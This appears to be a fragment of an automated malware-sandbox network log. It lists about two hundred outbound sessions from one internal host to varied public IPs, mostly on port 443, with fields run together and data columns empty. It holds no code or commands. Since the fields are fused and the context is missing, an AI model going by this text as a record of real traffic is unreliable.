                                                  10496192.168.2.1351838171.163.144.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10497192.168.2.1344926193.97.154.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10498192.168.2.1335894183.189.130.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10499192.168.2.1343302111.236.17.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10500192.168.2.1355682121.171.194.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10501192.168.2.1348318181.208.167.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10502192.168.2.1350568205.100.128.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10503192.168.2.1347192117.132.61.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10504192.168.2.1333092183.73.110.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10505192.168.2.1338852188.62.225.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10506192.168.2.1351854174.167.85.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10507192.168.2.135841824.74.185.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10508192.168.2.1347152163.214.181.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10509192.168.2.135663258.197.47.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10510192.168.2.1334178151.221.208.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10511192.168.2.1348452165.34.136.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10512192.168.2.135934483.195.192.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10513192.168.2.135424645.225.149.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10514192.168.2.136060014.184.210.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10515192.168.2.135354286.193.3.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10516192.168.2.1340452185.134.180.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10517192.168.2.1339188193.208.189.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10518192.168.2.1336632209.234.47.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10519192.168.2.133915254.246.199.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10520192.168.2.1334150134.90.44.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10521192.168.2.1342524133.38.190.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10522192.168.2.1351318167.113.230.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10523192.168.2.135613075.42.171.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10524192.168.2.1337274148.31.109.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10525192.168.2.13591408.118.36.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10526192.168.2.134425097.203.189.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10527192.168.2.1348842141.80.69.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10528192.168.2.13440369.235.108.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10529192.168.2.134191284.208.218.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10530192.168.2.1353174147.62.205.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10531192.168.2.1360682203.169.164.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10532192.168.2.1359970160.129.166.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10533192.168.2.133554643.7.26.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10534192.168.2.133755054.208.13.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10535192.168.2.134512417.22.109.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10536192.168.2.134377678.203.101.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10537192.168.2.1337368153.242.71.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10538192.168.2.1344872140.120.106.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10539192.168.2.133929872.11.254.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10540192.168.2.1352946185.54.193.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10541192.168.2.1356554191.246.114.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10542192.168.2.1355206195.49.147.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10543192.168.2.1337100199.90.152.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10544192.168.2.1353030110.218.193.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10545192.168.2.1337754106.141.40.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10546192.168.2.134802034.28.177.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10547192.168.2.135488283.154.92.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10548192.168.2.1334206136.212.203.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10549192.168.2.134528652.190.109.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10550192.168.2.135031219.51.226.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10551192.168.2.1340052191.190.122.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10552192.168.2.135819448.144.200.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10553192.168.2.134446084.247.255.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10554192.168.2.135335618.251.35.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10555192.168.2.1359098207.222.216.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10556192.168.2.1358648204.206.12.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10557192.168.2.133394218.41.129.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10558192.168.2.1356430103.91.166.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10559192.168.2.134115076.135.129.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10560192.168.2.1335034139.63.49.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10561192.168.2.135412648.57.63.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10562192.168.2.135202617.171.233.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10563192.168.2.134158419.28.34.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10564192.168.2.1357816112.4.194.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10565192.168.2.1335594113.29.118.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10566192.168.2.1352912185.221.54.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10567192.168.2.134516687.188.2.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10568192.168.2.135664885.237.130.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10569192.168.2.133605474.170.101.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10570192.168.2.1344762220.208.118.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10571192.168.2.1347294109.89.95.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10572192.168.2.133540643.140.7.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10573192.168.2.1360332186.15.166.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10574192.168.2.1346936199.45.25.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10575192.168.2.134373037.200.238.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10576192.168.2.135359891.24.19.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10577192.168.2.1341194125.53.99.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10578192.168.2.1335630167.8.55.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10579192.168.2.134502486.99.182.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10580192.168.2.1359512180.54.187.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10581192.168.2.134887631.57.155.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10582192.168.2.135485217.69.253.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10583192.168.2.134629862.122.252.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10584192.168.2.1359188154.52.86.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10585192.168.2.134589458.28.208.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10586192.168.2.1353460194.1.48.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10587192.168.2.1348946115.105.122.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10588192.168.2.134869080.39.229.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10589192.168.2.1359460181.128.72.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10590192.168.2.135943032.121.31.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10591192.168.2.133724295.3.145.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10592192.168.2.1356774104.249.158.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10593192.168.2.1333408180.37.143.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10594192.168.2.1337278117.234.209.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10595192.168.2.1341322168.115.163.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10596192.168.2.1356878205.184.69.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10597192.168.2.1357734123.136.107.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10598192.168.2.1354198174.116.84.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10599192.168.2.1358390154.253.204.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10600192.168.2.133808225.53.152.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10601192.168.2.1334058120.176.197.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10602192.168.2.1332992222.138.25.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10603192.168.2.135946070.242.190.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10604192.168.2.135430294.201.231.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10605192.168.2.134100817.51.56.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10606192.168.2.1339322110.9.77.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10607192.168.2.1344160133.10.185.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10608192.168.2.136072897.198.75.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10609192.168.2.134085466.90.236.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10610192.168.2.133478023.189.178.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10611192.168.2.1358400217.229.39.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10612192.168.2.1345156221.73.203.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10613192.168.2.135161225.138.228.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10614192.168.2.1355408154.106.150.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10615192.168.2.133764492.111.159.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10616192.168.2.133831686.137.61.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10617192.168.2.1344904223.8.5.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10618192.168.2.1338178182.3.79.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10619192.168.2.13427465.59.158.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10620192.168.2.1340238184.117.242.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10621192.168.2.1352606168.227.111.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10622192.168.2.1337346147.251.185.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10623192.168.2.1342536212.224.159.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10624192.168.2.1351544198.97.209.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10625192.168.2.1351692139.19.38.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10626192.168.2.1335650114.58.95.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10627192.168.2.135266678.142.76.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10628192.168.2.1333224203.235.225.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10629192.168.2.1349458153.120.124.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10630192.168.2.134711684.198.173.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10631192.168.2.133474086.45.193.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10632192.168.2.1344172104.248.46.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10633192.168.2.1344380133.25.214.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10634192.168.2.1357788143.83.170.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10635192.168.2.13497062.218.198.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10636192.168.2.1341748158.108.151.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10637192.168.2.1348274209.163.170.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10638192.168.2.133318217.79.70.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10639192.168.2.133346295.66.40.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10640192.168.2.1342920160.137.153.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10641192.168.2.1355372135.120.223.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10642192.168.2.1345482121.120.160.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10643192.168.2.135984842.2.182.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10644192.168.2.1349300209.114.56.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10645192.168.2.135037085.165.58.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10646192.168.2.1343494223.11.132.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10647192.168.2.133722277.188.175.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10648192.168.2.1332862175.225.44.898080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10649192.168.2.1353952115.11.73.1298080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10650192.168.2.1355658221.236.95.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10651192.168.2.1346136149.63.80.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10652192.168.2.134079420.192.40.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10653192.168.2.1339938223.230.157.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10654192.168.2.134416041.28.80.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10655192.168.2.1351028204.239.86.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10656192.168.2.1338948175.221.14.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10657192.168.2.133349424.58.191.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10658192.168.2.1348584147.219.58.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10659192.168.2.135286278.47.96.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10660192.168.2.1337916117.23.75.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10661192.168.2.1343512199.154.4.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10662192.168.2.1356272192.176.217.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10663192.168.2.1343164192.12.228.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10664192.168.2.1357022104.213.148.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10665192.168.2.135778885.243.209.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10666192.168.2.135203412.85.207.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10667192.168.2.1360056119.184.189.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10668192.168.2.134188238.187.100.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10669192.168.2.133799249.213.147.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10670192.168.2.1335920151.129.73.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10671192.168.2.1357314211.244.115.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10672192.168.2.1337560182.199.127.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10673192.168.2.134062694.165.93.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10674192.168.2.1333314176.195.176.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10675192.168.2.135398027.201.106.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10676192.168.2.1335986165.38.11.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10677192.168.2.136066018.30.222.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10678192.168.2.135734099.163.248.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10679192.168.2.135005839.103.88.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10680192.168.2.1346528133.55.176.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10681192.168.2.1336204159.165.110.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10682192.168.2.135555280.30.166.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10683192.168.2.1343334154.208.251.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10684192.168.2.1346476125.113.119.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10685192.168.2.135852461.216.176.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10686192.168.2.136033495.221.222.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10687192.168.2.1351460151.140.112.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10688192.168.2.1335628156.92.5.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10689192.168.2.1354334143.128.52.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10690192.168.2.1335994102.105.200.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10691192.168.2.133816278.29.10.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10692192.168.2.1356762187.210.180.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10693192.168.2.1355662212.45.251.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10694192.168.2.134042057.240.192.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10695192.168.2.1358440133.215.101.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10696192.168.2.1336984157.128.34.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10697192.168.2.134133468.5.46.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10698192.168.2.1353820199.85.79.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10699192.168.2.1359994143.85.110.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10700192.168.2.1359312159.29.89.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10701192.168.2.1354366142.124.64.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10702192.168.2.1356588185.87.186.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10703192.168.2.133818846.235.155.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10704192.168.2.1342598147.138.101.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10705192.168.2.134381872.237.203.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10706192.168.2.1337112153.221.216.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10707192.168.2.135722638.253.66.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10708192.168.2.1353548111.208.216.67443
